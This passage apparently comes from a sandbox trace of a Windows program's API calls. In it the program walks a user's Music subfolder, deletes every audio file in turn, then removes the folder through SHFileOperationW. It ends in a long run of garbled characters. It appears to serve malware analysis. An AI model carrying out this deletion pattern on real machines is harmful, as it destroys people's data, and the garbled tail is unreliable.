dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0207.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0207.073] CryptReleaseContext (hProv=0xa7c660, dwFlags=0x0) returned 1 [0207.073] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.073] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.073] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0207.073] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.074] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0207.074] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0207.074] FreeLibrary (hLibModule=0x76390000) returned 1 [0207.074] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.074] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.074] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.074] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.074] CloseHandle (hObject=0x520) returned 1 [0207.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.075] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.075] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.075] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0207.075] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\orL7CLboBO", lpFilePart=0x8cedf4*="orL7CLboBO") returned 0x20 [0207.075] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo")) returned 0x10 [0207.075] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29e34850, ftCreationTime.dwHighDateTime=0x1d5d080, ftLastAccessTime.dwLowDateTime=0x34635a50, ftLastAccessTime.dwHighDateTime=0x1d5cf99, ftLastWriteTime.dwLowDateTime=0x34635a50, ftLastWriteTime.dwHighDateTime=0x1d5cf99, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1c38 [0207.075] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29e34850, ftCreationTime.dwHighDateTime=0x1d5d080, ftLastAccessTime.dwLowDateTime=0x34635a50, ftLastAccessTime.dwHighDateTime=0x1d5cf99, ftLastWriteTime.dwLowDateTime=0x34635a50, ftLastWriteTime.dwHighDateTime=0x1d5cf99, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0207.075] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x34af0cb0, ftCreationTime.dwHighDateTime=0x1d5d715, ftLastAccessTime.dwLowDateTime=0x18885fe0, ftLastAccessTime.dwHighDateTime=0x1d5d0e0, ftLastWriteTime.dwLowDateTime=0x18885fe0, ftLastWriteTime.dwHighDateTime=0x1d5d0e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="1wj77Cd UgXHOz", cAlternateFileName="1WJ77C~1")) returned 1 [0207.075] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b3225d0, ftCreationTime.dwHighDateTime=0x1d5d5a4, ftLastAccessTime.dwLowDateTime=0xa939b6b0, ftLastAccessTime.dwHighDateTime=0x1d5cab9, ftLastWriteTime.dwLowDateTime=0xa939b6b0, ftLastWriteTime.dwHighDateTime=0x1d5cab9, nFileSizeHigh=0x0, nFileSizeLow=0xbbd0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="7fUsP9R.mp3", cAlternateFileName="")) returned 1 [0207.075] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\7fUsP9R.mp3" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo\\7fusp9r.mp3")) returned 1 [0207.078] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7e62510, ftCreationTime.dwHighDateTime=0x1d5cdfc, ftLastAccessTime.dwLowDateTime=0x36778510, ftLastAccessTime.dwHighDateTime=0x1d5c98a, ftLastWriteTime.dwLowDateTime=0x36778510, ftLastWriteTime.dwHighDateTime=0x1d5c98a, nFileSizeHigh=0x0, nFileSizeLow=0x3ca0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="E-_ UHbm9r xBWx.wav", cAlternateFileName="E-_UHB~1.WAV")) returned 1 [0207.078] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\E-_ UHbm9r xBWx.wav" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo\\e-_ uhbm9r xbwx.wav")) returned 1 [0207.088] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4925fb40, ftCreationTime.dwHighDateTime=0x1d5ca09, ftLastAccessTime.dwLowDateTime=0x97a24830, ftLastAccessTime.dwHighDateTime=0x1d5d271, ftLastWriteTime.dwLowDateTime=0x97a24830, ftLastWriteTime.dwHighDateTime=0x1d5d271, nFileSizeHigh=0x0, nFileSizeLow=0xffb9, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="I90LXDF7IW7vVm.wav", cAlternateFileName="I90LXD~1.WAV")) returned 1 [0207.088] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\I90LXDF7IW7vVm.wav" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo\\i90lxdf7iw7vvm.wav")) returned 1 [0207.090] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95b12720, ftCreationTime.dwHighDateTime=0x1d5d551, ftLastAccessTime.dwLowDateTime=0x10930e80, ftLastAccessTime.dwHighDateTime=0x1d5ca13, ftLastWriteTime.dwLowDateTime=0x10930e80, ftLastWriteTime.dwHighDateTime=0x1d5ca13, nFileSizeHigh=0x0, nFileSizeLow=0x93a2, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="nFbw0F6Kb-t.m4a", cAlternateFileName="NFBW0F~1.M4A")) returned 1 [0207.090] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\nFbw0F6Kb-t.m4a" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo\\nfbw0f6kb-t.m4a")) returned 1 [0207.092] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cb57000, ftCreationTime.dwHighDateTime=0x1d5ce3b, ftLastAccessTime.dwLowDateTime=0x549e420, ftLastAccessTime.dwHighDateTime=0x1d5d492, ftLastWriteTime.dwLowDateTime=0x549e420, ftLastWriteTime.dwHighDateTime=0x1d5d492, nFileSizeHigh=0x0, nFileSizeLow=0x6321, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="OH4sK1dy1LptcRp3Gv1.m4a", cAlternateFileName="OH4SK1~1.M4A")) returned 1 [0207.092] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\OH4sK1dy1LptcRp3Gv1.m4a" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo\\oh4sk1dy1lptcrp3gv1.m4a")) returned 1 [0207.093] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0154470, ftCreationTime.dwHighDateTime=0x1d5d365, ftLastAccessTime.dwLowDateTime=0x33f8c050, ftLastAccessTime.dwHighDateTime=0x1d5c904, ftLastWriteTime.dwLowDateTime=0x33f8c050, ftLastWriteTime.dwHighDateTime=0x1d5c904, nFileSizeHigh=0x0, nFileSizeLow=0x96c6, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="qJ0Tj3.m4a", cAlternateFileName="")) returned 1 [0207.093] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\qJ0Tj3.m4a" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo\\qj0tj3.m4a")) returned 1 [0207.096] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x882037e0, ftCreationTime.dwHighDateTime=0x1d5cdc2, ftLastAccessTime.dwLowDateTime=0xc64b2790, ftLastAccessTime.dwHighDateTime=0x1d5d813, ftLastWriteTime.dwLowDateTime=0xc64b2790, ftLastWriteTime.dwHighDateTime=0x1d5d813, nFileSizeHigh=0x0, nFileSizeLow=0xc235, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="RoXFqe.m4a", cAlternateFileName="")) returned 1 [0207.096] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\RoXFqe.m4a" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo\\roxfqe.m4a")) returned 1 [0207.098] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd57955e0, ftCreationTime.dwHighDateTime=0x1d5d54b, ftLastAccessTime.dwLowDateTime=0xc9b7dc70, ftLastAccessTime.dwHighDateTime=0x1d5cf9e, ftLastWriteTime.dwLowDateTime=0xc9b7dc70, ftLastWriteTime.dwHighDateTime=0x1d5cf9e, nFileSizeHigh=0x0, nFileSizeLow=0xc23c, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="t4l59SWQvTZrKs.wav", cAlternateFileName="T4L59S~1.WAV")) returned 1 [0207.098] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\t4l59SWQvTZrKs.wav" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo\\t4l59swqvtzrks.wav")) returned 1 [0207.101] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f10cc0, ftCreationTime.dwHighDateTime=0x1d5cbc8, ftLastAccessTime.dwLowDateTime=0x23bb650, ftLastAccessTime.dwHighDateTime=0x1d5d52d, ftLastWriteTime.dwLowDateTime=0x23bb650, ftLastWriteTime.dwHighDateTime=0x1d5d52d, nFileSizeHigh=0x0, nFileSizeLow=0xc164, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="y13gchaL-QREAY0.m4a", cAlternateFileName="Y13GCH~1.M4A")) returned 1 [0207.101] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\y13gchaL-QREAY0.m4a" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo\\y13gchal-qreay0.m4a")) returned 1 [0207.102] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb0460e0, ftCreationTime.dwHighDateTime=0x1d5d0fc, ftLastAccessTime.dwLowDateTime=0x37180f00, ftLastAccessTime.dwHighDateTime=0x1d5d347, ftLastWriteTime.dwLowDateTime=0x37180f00, ftLastWriteTime.dwHighDateTime=0x1d5d347, nFileSizeHigh=0x0, nFileSizeLow=0xbeaf, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ZKIXOpR.mp3", cAlternateFileName="")) returned 1 [0207.102] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO\\ZKIXOpR.mp3" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo\\zkixopr.mp3")) returned 1 [0207.104] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb0460e0, ftCreationTime.dwHighDateTime=0x1d5d0fc, ftLastAccessTime.dwLowDateTime=0x37180f00, ftLastAccessTime.dwHighDateTime=0x1d5d347, ftLastWriteTime.dwLowDateTime=0x37180f00, ftLastWriteTime.dwHighDateTime=0x1d5d347, nFileSizeHigh=0x0, nFileSizeLow=0xbeaf, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ZKIXOpR.mp3", cAlternateFileName="")) returned 0 [0207.104] FindClose (in: hFindFile=0x9e1c38 | out: hFindFile=0x9e1c38) returned 1 [0207.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74bf0 | out: hHeap=0x2af0000) returned 1 [0207.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0207.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0207.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0207.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.108] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0207.108] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0207.108] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0207.108] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0207.109] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a749e8 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0207.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0207.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0207.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0207.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0207.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0207.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0207.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0207.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0207.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0207.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0207.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0207.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0207.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0207.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x42) returned 0x2a5d660 [0207.110] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\orL7CLboBO", lpFilePart=0x8cf650*="orL7CLboBO") returned 0x20 [0207.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d660 | out: hHeap=0x2af0000) returned 1 [0207.110] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo")) returned 0x10 [0207.110] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Music\\orL7CLboBO", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾